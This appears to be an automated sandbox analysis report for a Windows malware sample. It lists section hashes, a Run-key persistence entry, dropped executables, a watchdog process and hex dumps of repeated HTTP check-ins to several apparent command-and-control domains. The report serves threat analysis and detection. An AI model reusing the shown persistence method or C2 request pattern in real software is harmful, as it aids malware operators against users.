Analysis Date2015-05-12 15:40:17

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.text md5: 54efa65880591bfb4c0a260dec1c27cc sha1: 33127554bb7da82dff55eb220277ee176c3c56b8 size: 296960
Section .rdata md5: 674c8d1091339ce4bde97f17656fded2 sha1: ea5b527560c243cc0aa5aec61c77ba05178c0aee size: 34304; [section name missing from extraction] md5: a30930bddf490a7e36bdd9a5ae5ccc3c sha1: d45b5ce10b12725c7c7375c0cbbc428d4456e296 size: 98304
Timestamp: 2014-10-30 09:48:29
Packer: Microsoft Visual C++ ?.?

Runtime Details:


↳ C:\malware.exe

Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\COM Certificate SPP Interface ➝
C:\Documents and Settings\Administrator\Application Data\rlttxuwzegkd\f5jzjvdxmbo.exe
Creates File: C:\Documents and Settings\Administrator\Application Data\rlttxuwzegkd\f5jzjvdxmbo.exe
Creates Process: C:\Documents and Settings\Administrator\Application Data\rlttxuwzegkd\f5jzjvdxmbo.exe

↳ C:\Documents and Settings\Administrator\Application Data\rlttxuwzegkd\f5jzjvdxmbo.exe

Creates File: C:\Documents and Settings\Administrator\Application Data\rlttxuwzegkd\oaoeo3ib.exe
Creates File: \Device\Afd\Endpoint
Creates File: C:\Documents and Settings\Administrator\Application Data\rlttxuwzegkd\f5jzjvdxmbo.qbu
Creates Process: WATCHDOGPROC "C:\Documents and Settings\Administrator\Application Data\rlttxuwzegkd\f5jzjvdxmbo.exe"

↳ WATCHDOGPROC "C:\Documents and Settings\Administrator\Application Data\rlttxuwzegkd\f5jzjvdxmbo.exe"

Flows TCP192.168.1.1:1031 ➝
Flows TCP192.168.1.1:1032 ➝
Flows TCP192.168.1.1:1033 ➝
Flows TCP192.168.1.1:1034 ➝
Flows TCP192.168.1.1:1035 ➝
Flows TCP192.168.1.1:1036 ➝
Flows TCP192.168.1.1:1037 ➝
Flows TCP192.168.1.1:1038 ➝
Flows TCP192.168.1.1:1039 ➝

Raw Pcap
0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d6c6962 70757270 6c655f59   mail=libpurple_Y
0x00000020 (00032)   61686f6f 5f616d61 2e696f6e 65736375   ahoo_ama.ionescu
0x00000030 (00048)   266d6574 686f643d 706f7374 266c656e   &method=post&len
0x00000040 (00064)   20485454 502f312e 300d0a41 63636570    HTTP/1.0..Accep
0x00000050 (00080)   743a202a 2f2a0d0a 436f6e6e 65637469   t: */*..Connecti
0x00000060 (00096)   6f6e3a20 636c6f73 650d0a48 6f73743a   on: close..Host:
0x00000070 (00112)   20666c69 6572636f 6e746169 6e2e6e65    fliercontain.ne
0x00000080 (00128)   740d0a0d 0a                           t....

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d6c6962 70757270 6c655f59   mail=libpurple_Y
0x00000020 (00032)   61686f6f 5f616d61 2e696f6e 65736375   ahoo_ama.ionescu
0x00000030 (00048)   266d6574 686f643d 706f7374 266c656e   &method=post&len
0x00000040 (00064)   20485454 502f312e 300d0a41 63636570    HTTP/1.0..Accep
0x00000050 (00080)   743a202a 2f2a0d0a 436f6e6e 65637469   t: */*..Connecti
0x00000060 (00096)   6f6e3a20 636c6f73 650d0a48 6f73743a   on: close..Host:
0x00000070 (00112)   20627265 6164636f 6e746169 6e2e6e65    breadcontain.ne
0x00000080 (00128)   740d0a0d 0a                           t....

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d6c6962 70757270 6c655f59   mail=libpurple_Y
0x00000020 (00032)   61686f6f 5f616d61 2e696f6e 65736375   ahoo_ama.ionescu
0x00000030 (00048)   266d6574 686f643d 706f7374 266c656e   &method=post&len
0x00000040 (00064)   20485454 502f312e 300d0a41 63636570    HTTP/1.0..Accep
0x00000050 (00080)   743a202a 2f2a0d0a 436f6e6e 65637469   t: */*..Connecti
0x00000060 (00096)   6f6e3a20 636c6f73 650d0a48 6f73743a   on: close..Host:
0x00000070 (00112)   20627265 61646261 736b6574 2e6e6574    breadbasket.net
0x00000080 (00128)   0d0a0d0a 0a                           .....

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d6c6962 70757270 6c655f59   mail=libpurple_Y
0x00000020 (00032)   61686f6f 5f616d61 2e696f6e 65736375   ahoo_ama.ionescu
0x00000030 (00048)   266d6574 686f643d 706f7374 266c656e   &method=post&len
0x00000040 (00064)   20485454 502f312e 300d0a41 63636570    HTTP/1.0..Accep
0x00000050 (00080)   743a202a 2f2a0d0a 436f6e6e 65637469   t: */*..Connecti
0x00000060 (00096)   6f6e3a20 636c6f73 650d0a48 6f73743a   on: close..Host:
0x00000070 (00112)   20736561 736f6e62 6563616d 652e6e65    seasonbecame.ne
0x00000080 (00128)   740d0a0d 0a                           t....

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d6c6962 70757270 6c655f59   mail=libpurple_Y
0x00000020 (00032)   61686f6f 5f616d61 2e696f6e 65736375   ahoo_ama.ionescu
0x00000030 (00048)   266d6574 686f643d 706f7374 266c656e   &method=post&len
0x00000040 (00064)   20485454 502f312e 300d0a41 63636570    HTTP/1.0..Accep
0x00000050 (00080)   743a202a 2f2a0d0a 436f6e6e 65637469   t: */*..Connecti
0x00000060 (00096)   6f6e3a20 636c6f73 650d0a48 6f73743a   on: close..Host:
0x00000070 (00112)   20656c65 63747269 63646576 6963652e    electricdevice.
0x00000080 (00128)   6e65740d 0a0d0a                       net....

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d6c6962 70757270 6c655f59   mail=libpurple_Y
0x00000020 (00032)   61686f6f 5f616d61 2e696f6e 65736375   ahoo_ama.ionescu
0x00000030 (00048)   266d6574 686f643d 706f7374 266c656e   &method=post&len
0x00000040 (00064)   20485454 502f312e 300d0a41 63636570    HTTP/1.0..Accep
0x00000050 (00080)   743a202a 2f2a0d0a 436f6e6e 65637469   t: */*..Connecti
0x00000060 (00096)   6f6e3a20 636c6f73 650d0a48 6f73743a   on: close..Host:
0x00000070 (00112)   20747261 64657365 74746c65 2e6e6574    tradesettle.net
0x00000080 (00128)   0d0a0d0a 0a0d0a                       .......

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d6c6962 70757270 6c655f59   mail=libpurple_Y
0x00000020 (00032)   61686f6f 5f616d61 2e696f6e 65736375   ahoo_ama.ionescu
0x00000030 (00048)   266d6574 686f643d 706f7374 266c656e   &method=post&len
0x00000040 (00064)   20485454 502f312e 300d0a41 63636570    HTTP/1.0..Accep
0x00000050 (00080)   743a202a 2f2a0d0a 436f6e6e 65637469   t: */*..Connecti
0x00000060 (00096)   6f6e3a20 636c6f73 650d0a48 6f73743a   on: close..Host:
0x00000070 (00112)   20737472 65657464 65766963 652e6e65    streetdevice.ne
0x00000080 (00128)   740d0a0d 0a0d0a                       t......

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d6c6962 70757270 6c655f59   mail=libpurple_Y
0x00000020 (00032)   61686f6f 5f616d61 2e696f6e 65736375   ahoo_ama.ionescu
0x00000030 (00048)   266d6574 686f643d 706f7374 266c656e   &method=post&len
0x00000040 (00064)   20485454 502f312e 300d0a41 63636570    HTTP/1.0..Accep
0x00000050 (00080)   743a202a 2f2a0d0a 436f6e6e 65637469   t: */*..Connecti
0x00000060 (00096)   6f6e3a20 636c6f73 650d0a48 6f73743a   on: close..Host:
0x00000070 (00112)   20626574 74657264 65766963 652e6e65    betterdevice.ne
0x00000080 (00128)   740d0a0d 0a0d0a                       t......

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d6c6962 70757270 6c655f59   mail=libpurple_Y
0x00000020 (00032)   61686f6f 5f616d61 2e696f6e 65736375   ahoo_ama.ionescu
0x00000030 (00048)   266d6574 686f643d 706f7374 266c656e   &method=post&len
0x00000040 (00064)   20485454 502f312e 300d0a41 63636570    HTTP/1.0..Accep
0x00000050 (00080)   743a202a 2f2a0d0a 436f6e6e 65637469   t: */*..Connecti
0x00000060 (00096)   6f6e3a20 636c6f73 650d0a48 6f73743a   on: close..Host:
0x00000070 (00112)   20666c69 65726265 666f7265 2e6e6574    flierbefore.net
0x00000080 (00128)   0d0a0d0a 0a0d0a                       .......
